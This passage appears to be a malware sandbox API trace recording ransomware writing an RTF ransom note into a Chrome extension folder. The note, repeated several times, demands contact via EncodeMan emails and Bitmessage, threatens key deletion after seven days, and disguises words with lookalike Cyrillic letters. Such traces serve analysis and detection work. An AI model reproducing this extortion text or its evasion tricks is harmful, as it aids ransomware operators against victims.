g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.800] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.801] CloseHandle (hObject=0x284) returned 1 [0269.801] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0269.801] GetLastError () returned 0x2 [0269.801] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 